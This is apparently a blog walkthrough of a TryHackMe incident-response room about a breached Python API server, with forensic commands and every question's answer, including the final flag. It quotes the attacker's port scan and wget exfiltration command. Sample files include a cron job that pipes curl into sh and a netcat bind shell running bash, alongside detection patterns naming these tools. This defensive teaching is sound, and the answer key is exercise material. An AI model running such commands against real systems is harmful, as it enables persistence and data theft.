DEV Community

haXarubiX

TryHackMe API Wizard Breach Walkthrough

Task 1: Preparation

Step 1.1 SSH into the Machine

SSH into the box with the credentials provided.

ssh <username>@<IP_address>
# Replace <username> and <IP_address> with the values given

Task 2: Initial Access

Question 1: Which programming language is the web application written in?

Navigate through the directories to find the application’s code.

cd /home/support/api_service
ls -la

Answer: Python

Question 2: What is the IP address that attacked the web server?

The web server uses NGINX, so we can check its logs for suspicious activity.

cd /var/log/nginx
tail -n 10 access.log.1

Look for commands like whoami, pwd, or id, which indicate enumeration attempts by an attacker.

Answer: 149.34.244.142
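As an added example (not part of the original walkthrough), the same check done programmatically: parse NGINX combined-format lines, URL-decode the request path, flag requests that carry enumeration commands, then rank the source IPs. The log lines are constructed with TEST-NET addresses; neither they nor the IP they flag come from the room.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed NGINX "combined" log lines (TEST-NET addresses); not taken from the room's server.
SAMPLE_ACCESS_LOG = """\
198.51.100.7 - - [10/Aug/2023:10:01:02 +0000] "GET /api/status HTTP/1.1" 200 17 "-" "curl/7.81.0"
203.0.113.5 - - [10/Aug/2023:10:02:10 +0000] "GET /api/ping?host=127.0.0.1;whoami HTTP/1.1" 200 42 "-" "python-requests/2.31"
203.0.113.5 - - [10/Aug/2023:10:02:11 +0000] "GET /api/ping?host=127.0.0.1%3Bid HTTP/1.1" 200 58 "-" "python-requests/2.31"
203.0.113.5 - - [10/Aug/2023:10:02:12 +0000] "GET /api/ping?host=127.0.0.1%7C%20pwd HTTP/1.1" 200 30 "-" "python-requests/2.31"
198.51.100.7 - - [10/Aug/2023:10:03:00 +0000] "GET /api/status HTTP/1.1" 200 17 "-" "curl/7.81.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# First-contact enumeration commands; matched only when delimited like a shell word.
ENUM_COMMANDS = ("whoami", "id", "pwd", "uname", "cat /etc/passwd")
ENUM_RE = re.compile(
    r"(?:^|[;&|`$(\s])(?:" + "|".join(re.escape(c) for c in ENUM_COMMANDS) + r")(?=$|[\s;&|)])"
)

def find_enumeration(log_text):
    """Return (ip, timestamp, decoded_uri) for each request whose URI carries an enumeration command."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        uri = unquote(m.group("uri"))  # decode %3B, %7C, %20 ... so encoded payloads are seen too
        if ENUM_RE.search(uri):
            hits.append((m.group("ip"), m.group("ts"), uri))
    return hits

def rank_sources(hits):
    """Most active source IPs first, e.g. [('203.0.113.5', 3)]."""
    return Counter(ip for ip, _, _ in hits).most_common()
```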

Question 3: Which vulnerability was found and exploited in the API service?

Inspect the api.py source code for vulnerabilities, particularly around command handling.

cat /home/support/api_service/api.py

Answer: OS command injection
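A minimal illustration of the vulnerability class named above, added here and not taken from the room's api.py: a hypothetical "ping a host" endpoint, first with the caller's value spliced into a shell string (the injectable pattern to look for when reading the source), then with validated input passed as one argv element and no shell.

```python
import ipaddress
import subprocess

# Hypothetical ping endpoint standing in for the room's api.py (added example, not the room's code).

def build_ping_command_vulnerable(host):
    """'Before': the caller's value is spliced into a shell command line.
    Run with shell=True (or os.system / os.popen), a ';' or '|' inside `host` ends the ping
    and starts a second command: OS command injection. When auditing, grep the service for
    shell=True, os.system and os.popen and trace where their arguments come from."""
    return f"ping -c 1 {host}"

def validate_host(host):
    """Accept an IP literal or a plain DNS name; reject anything else before it reaches a process."""
    try:
        ipaddress.ip_address(host)
        return host
    except ValueError:
        pass
    labels = host.split(".")
    if 0 < len(host) <= 253 and all(
        label and not label.startswith("-") and label.replace("-", "").isalnum() for label in labels
    ):
        return host
    raise ValueError(f"rejected host argument: {host!r}")

def build_ping_command_hardened(host):
    """'After': validated input is a single argv element; no shell parses it, so metacharacters are inert."""
    return ["ping", "-c", "1", validate_host(host)]

def ping(host, timeout=5):
    """Run the hardened command without a shell and return (returncode, stdout)."""
    proc = subprocess.run(build_ping_command_hardened(host), capture_output=True, text=True, timeout=timeout)
    return proc.returncode, proc.stdout
```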

Question 4: Which file contained the credentials used to privilege escalate to root?

Examine the configuration file for any stored credentials.

cat /home/dev/apiservice/src/config.py

Answer: /home/dev/apiservice/src/config.py

Question 5: What file did the hacker drop and execute to persist on the server?

Check the bash history to uncover any evidence of files dropped.

sudo su
cat /root/.bash_history

Answer: /tmp/rooter2

Question 6: Which service was used to host the “rooter2” malware?

In .bash_history, look for commands involving file uploads or downloads.

Answer: transfer.sh


Task 3: Further Actions

Question 7: Which two system files were infected to achieve cron persistence?

Check crontab and environment files for unauthorized entries.

cat /etc/crontab
cat /etc/environment

Answer: /etc/crontab, /etc/environment

Question 8: What is the C2 server IP address of the malicious actor?

Locate the IP address associated with the SYSTEMUPDATE variable in /etc/environment or other files identified in bash history.

Answer: 5.230.66.147

Question 9: What port is the backdoored bind bash shell listening on?

Use ps to check running processes for a netcat listener.

ps -aux | grep nc

Answer: 3578

Question 10: How does the bind shell persist across reboots?

Locate the systemd service created by the attacker.

grep -R "nc -l" /

Answer: systemd service

Question 11: What is the absolute path of the malicious service?

Find the absolute path from the output of the grep command above.

Answer: /etc/systemd/system/socket.service
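The persistence checks of Questions 7 to 11 as one triage script, added here as an example and not part of the original walkthrough: it parses a system crontab, resolves variables through /etc/environment so a host hidden behind a variable name becomes visible, and pulls the listener port out of a systemd unit's ExecStart line. All file contents below are constructed samples; the addresses and port are not the room's values.

```python
import re
import shlex

# Constructed sample contents modelled on the artefacts this task points at (not copied from the room's box).
CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *   * * *   root   cd / && run-parts --report /etc/cron.hourly
*/5 *  * * *   root   curl -s http://$SYSTEMUPDATE/update.sh | sh
"""
ENVIRONMENT = 'PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"\nSYSTEMUPDATE=198.51.100.23\n'
SOCKET_SERVICE = "[Unit]\nDescription=Socket service\n[Service]\nExecStart=/bin/sh -c 'nc -lvp 4444 -e /bin/bash'\nRestart=always\n"

VAR_RE = re.compile(r"\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?")
# Heuristic: jobs that fetch remote content, pipe it into a shell, or open network sockets.
SUSPICIOUS_RE = re.compile(r"\b(?:curl|wget|nc|ncat|netcat|base64)\b|/dev/tcp|\|\s*(?:ba)?sh\b")

def parse_environment(text):
    """Parse KEY=value lines of /etc/environment; values may be quoted."""
    env = {}
    for line in text.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep and not key.startswith("#"):
            env[key] = shlex.split(value)[0] if value.strip() else ""
    return env

def parse_crontab(text):
    """Yield (schedule, user, command) from system crontab lines, skipping comments and assignments."""
    for line in text.splitlines():
        fields = line.split(None, 6)
        if len(fields) == 7 and not line.lstrip().startswith("#") and "=" not in fields[0]:
            yield " ".join(fields[:5]), fields[5], fields[6]

def triage_cron(crontab_text, environment_text):
    """Flag suspicious cron jobs and resolve $VARS via /etc/environment to expose the hidden host."""
    env = parse_environment(environment_text)
    findings = []
    for schedule, user, command in parse_crontab(crontab_text):
        if SUSPICIOUS_RE.search(command):
            resolved = VAR_RE.sub(lambda m: env.get(m.group(1), m.group(0)), command)
            findings.append({"schedule": schedule, "user": user, "command": command, "resolved": resolved})
    return findings

def find_listener_ports(unit_text):
    """Return ports of netcat listeners declared on ExecStart= lines of a systemd unit."""
    ports = []
    for line in unit_text.splitlines():
        if line.startswith("ExecStart=") and re.search(r"\b(?:nc|ncat|netcat)\b.*\s-\w*l", line):
            m = re.search(r"-\w*[lp]\w*\s+(\d{2,5})\b", line)
            if m:
                ports.append(int(m.group(1)))
    return ports
```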


Task 4: Even More Persistence

Question 12: Which port is blocked on the victim’s firewall?

Use iptables to examine the firewall configuration.

iptables -L

Answer: 3578

Question 13: How do the firewall rules persist across reboots?

Check the root user's bash configuration files for persistence mechanisms.

cat /root/.bashrc

Answer: /root/.bashrc

Question 14: How is the backdoored local Linux user named?

Inspect the /etc/passwd file for unusual user entries.

grep "/bin/bash" /etc/passwd

Answer: support

Question 15: Which privileged group was assigned to the user?

Use the groups command to list group memberships for the user.

groups support

Answer: sudo

Question 16: What is the strange word on one of the backdoored SSH keys?

View the authorized_keys file in the root user’s SSH directory.

cat /root/.ssh/authorized_keys

Answer: ntsvc

Question 17: Can you spot and name one more popular persistence method? Not a MITRE technique name.

Check for files with the SUID bit set.

find / -perm -u=s -type f 2>/dev/null

Answer: SUID binary

Question 18: What are the original and the backdoored binaries from question 6?

Verify the integrity of the suspected binary.

ls -l /usr/bin/clamav
dpkg --verify clamav

Answer: /usr/bin/bash, /usr/bin/clamav

Question 19: What technique was used to hide the backdoor creation date?

Compare the backdoored binary's timestamps with those of the neighbouring system binaries: a modification time that has been set to blend in with the originals points to deliberate timestamp modification.

Answer: Timestomping


Task 5: Final Target

Question 20: What file was dropped which contained gathered victim information?

Check root’s .bash_history for evidence of dropped files.

cat /root/.bash_history

Answer: /root/.dump.json

Question 21: According to the dropped dump, what is the server’s kernel version?

Decode and inspect .dump.json for details.

cat /root/.dump.json | base64 -d

Answer: 5.15.0-78-generic

Question 22: Which active internal IPs were found by the “rooter2” network scan?

Identify internal IPs from the dump.

Answer: 192.168.0.21,192.168.0.22

Question 23: How did the hacker find an exposed HTTP index on another internal IP?

Check the history for a network scan command.

grep -i "nc -zv" /root/.bash_history

Answer: nc -zv 192.168.0.22 1024-10000 2>&1 | grep -v failed

Question 24: What command was used to exfiltrate the CDE database from the internal IP?

Locate the wget command in the history.

grep "wget" /root/.bash_history

Answer: wget 192.168.0.22:8080/cde-backup.csv

Question 25: What is the most secret and precious string stored in the exfiltrated database?

Inspect the contents of the exfiltrated .review.csv file.

cat .review.csv | head -n 10

Answer: pwned{v3ry-secur3-cardh0ld3r-data-environm3nt}

Another skill acquired, another challenge conquered in the Rubixverse. Keep hacking the limits... until the next hack.